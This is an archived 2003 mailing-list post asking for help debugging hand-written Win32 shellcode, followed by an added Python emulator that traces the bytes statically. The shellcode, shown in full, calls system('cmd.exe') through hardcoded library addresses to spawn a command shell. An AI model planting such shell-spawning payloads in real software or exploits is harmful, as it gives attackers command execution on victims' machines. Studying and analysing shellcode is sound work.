Vulnerability Development mailing list archives

shellcode not executing if optimizations are on.


From: "wirepair" <wirepair () roguemail net>
Date: Wed, 30 Apr 2003 08:46:20 -0700

Ok so I'm still trying my hand at writing shellcode for win32. My problem is my code executes fine as long as I compile without optimizations; if I disable optimizations it executes fine and I get my cmd.exe shell. Could anyone throw me a fricken bone and tell me what I'm doing wrong? You can find my inline asm (which this is based off of) at: http://sh0dan.org/files/llacmd.txt. But if you're lazy like I am you'll probably just want to see this:

#include <stdio.h>

int main(int argc, char **argv) {
    /* One x86 instruction per line; the comment is its disassembly. */
    char shellcizode[] =
        "\x55"                  // push ebp
        "\x8b\xec"              // mov ebp, esp
        "\x53"                  // push ebx
        "\x56"                  // push esi
        "\x57"                  // push edi
        "\x8b\xe5"              // mov esp, ebp   (assumes ebp is the caller's frame pointer)
        "\x55"                  // push ebp
        "\x8b\xec"              // mov ebp, esp
        "\x33\xff"              // xor edi, edi
        "\x57"                  // push edi       (zero [ebp-4])
        "\x57"                  // push edi       (zero [ebp-8])
        "\xc6\x45\xf8\x6d"      // mov byte ptr ss:[ebp-8], 6dh   'm'
        "\xc6\x45\xf9\x73"      // mov byte ptr ss:[ebp-7], 73h   's'
        "\xc6\x45\xfa\x76"      // mov byte ptr ss:[ebp-6], 76h   'v'
        "\xc6\x45\xfb\x63"      // mov byte ptr ss:[ebp-5], 63h   'c'
        "\xc6\x45\xfc\x72"      // mov byte ptr ss:[ebp-4], 72h   'r'
        "\xc6\x45\xfd\x74"      // mov byte ptr ss:[ebp-3], 74h   't'  (NUL at [ebp-2])
        "\xb8\xe8\xfe\xe9\x77"  // mov eax, 77e9fee8h   ; kernel32!LoadLibraryA
        "\x50"                  // push eax
        "\x8d\x45\xf8"          // lea eax, dword ptr ss:[ebp-8]
        "\x50"                  // push eax
        "\xff\x55\xf4"          // call dword ptr ss:[ebp-0ch]   ; LoadLibraryA("msvcrt")
        "\x58"                  // pop eax
        "\x58"                  // pop eax
        "\x58"                  // pop eax
        "\x33\xc0"              // xor eax, eax
        "\x50"                  // push eax       (zero [ebp-4])
        "\x50"                  // push eax       (zero [ebp-8])
        "\xc6\x45\xf8\x63"      // mov byte ptr ss:[ebp-8], 63h   'c'
        "\xc6\x45\xf9\x6d"      // mov byte ptr ss:[ebp-7], 6dh   'm'
        "\xc6\x45\xfa\x64"      // mov byte ptr ss:[ebp-6], 64h   'd'
        "\xc6\x45\xfb\x2e"      // mov byte ptr ss:[ebp-5], 2eh   '.'
        "\xc6\x45\xfc\x65"      // mov byte ptr ss:[ebp-4], 65h   'e'
        "\xc6\x45\xfd\x78"      // mov byte ptr ss:[ebp-3], 78h   'x'
        "\xc6\x45\xfe\x65"      // mov byte ptr ss:[ebp-2], 65h   'e'  (NUL at [ebp-1])
        "\xb8\xc3\xaf\x01\x78"  // mov eax, 7801afc3h   ; address of system() from msvcrt
        "\x50"                  // push eax
        "\x8d\x45\xf8"          // lea eax, dword ptr ss:[ebp-8]
        "\x50"                  // push eax
        "\xff\x55\xf4"          // call dword ptr ss:[ebp-0ch]   ; system("cmd.exe")
        "\x83\xc4\x04"          // add esp, 04h
        "\x5c"                  // pop esp
        "\xc3";                 // ret   we're done!

    ((void (*)(void))shellcizode)();

    return 0;
}
I'm sure the formatting got totally screwed, but basically I'm calling LoadLibraryA with msvcrt to be able to use the address of system() to execute cmd.exe. Now this only works IF optimizations are disabled. Any hints??
Thanks,
-wire
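A way to check statically what those bytes do without running them, as an added example that is not part of the post: a small Python tracer that emulates only the opcodes this shellcode uses (flat memory, ebp/esp at an arbitrary base) and reports each call together with the string the code built on the stack for it. The SYMBOLS map (address to callee name and bytes the callee pops) is an assumption taken from the post's own comments and is only valid for the poster's machine.

```python
# Bytes of the shellcode string in the post above, constructed here from its \x escapes.
SHELLCODE = bytes.fromhex(
    "55 8bec 53 56 57 8be5 55 8bec 33ff 57 57 c645f86d c645f973 c645fa76 c645fb63"
    " c645fc72 c645fd74 b8e8fee977 50 8d45f8 50 ff55f4 58 58 58 33c0 50 50 c645f863"
    " c645f96d c645fa64 c645fb2e c645fc65 c645fd78 c645fe65 b8c3af0178 50 8d45f8 50"
    " ff55f4 83c404 5c c3"
)
# Addresses the post's comments name, plus how many argument bytes each callee pops on
# return (LoadLibraryA is stdcall, system is cdecl). Assumed; valid only for the poster's box.
SYMBOLS = {0x77E9FEE8: ("kernel32!LoadLibraryA", 4), 0x7801AFC3: ("msvcrt!system", 0)}
REG = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # x86 register numbering

def trace_calls(code, symbols=SYMBOLS, base=0x1000):
    """Emulate the few opcodes this shellcode uses; return (callee, string argument) per call."""
    regs = dict.fromkeys(REG, 0); regs["esp"] = regs["ebp"] = base
    mem, calls, i = {}, [], 0
    rd32 = lambda a: int.from_bytes(bytes(mem.get(a + k, 0) for k in range(4)), "little")
    wr32 = lambda a, v: mem.update(zip(range(a, a + 4), (v & 0xFFFFFFFF).to_bytes(4, "little")))
    disp8 = lambda k: int.from_bytes(code[k:k + 1], "little", signed=True)
    def rdstr(a):  # NUL-terminated string built on the emulated stack
        s = bytearray()
        while mem.get(a, 0): s.append(mem[a]); a += 1
        return s.decode()
    while i < len(code):
        op = code[i]
        if op == 0xC3: break                                    # ret: shellcode is done
        elif 0x50 <= op <= 0x57:                                # push r32
            regs["esp"] -= 4; wr32(regs["esp"], regs[REG[op - 0x50]]); i += 1
        elif 0x58 <= op <= 0x5F:                                # pop r32 (covers pop esp)
            v = rd32(regs["esp"]); regs["esp"] += 4; regs[REG[op - 0x58]] = v; i += 1
        elif op in (0x8B, 0x33) and code[i + 1] >= 0xC0:        # mov / xor r32, r32
            m = code[i + 1]; dst, src = REG[(m >> 3) & 7], REG[m & 7]
            regs[dst] = regs[src] if op == 0x8B else regs[dst] ^ regs[src]; i += 2
        elif 0xB8 <= op <= 0xBF:                                # mov r32, imm32
            regs[REG[op - 0xB8]] = int.from_bytes(code[i + 1:i + 5], "little"); i += 5
        elif op == 0xC6 and code[i + 1] == 0x45:                # mov byte [ebp+disp8], imm8
            mem[regs["ebp"] + disp8(i + 2)] = code[i + 3]; i += 4
        elif op == 0x8D and code[i + 1] == 0x45:                # lea eax, [ebp+disp8]
            regs["eax"] = regs["ebp"] + disp8(i + 2); i += 3
        elif op == 0xFF and code[i + 1] == 0x55:                # call dword ptr [ebp+disp8]
            name, cleanup = symbols.get(rd32(regs["ebp"] + disp8(i + 2)), ("unknown", 0))
            calls.append((name, rdstr(rd32(regs["esp"]))))     # first argument is at [esp]
            regs["esp"] += cleanup; i += 3                      # stdcall callee pops its args
        elif op == 0x83 and code[i + 1] == 0xC4:                # add esp, imm8
            regs["esp"] += code[i + 2]; i += 3
        else:
            raise ValueError(f"unhandled opcode {op:#04x} at offset {i}")
    return calls
```

Running trace_calls(SHELLCODE) recovers the two calls the post describes, LoadLibraryA("msvcrt") then system("cmd.exe"), from the bytes alone.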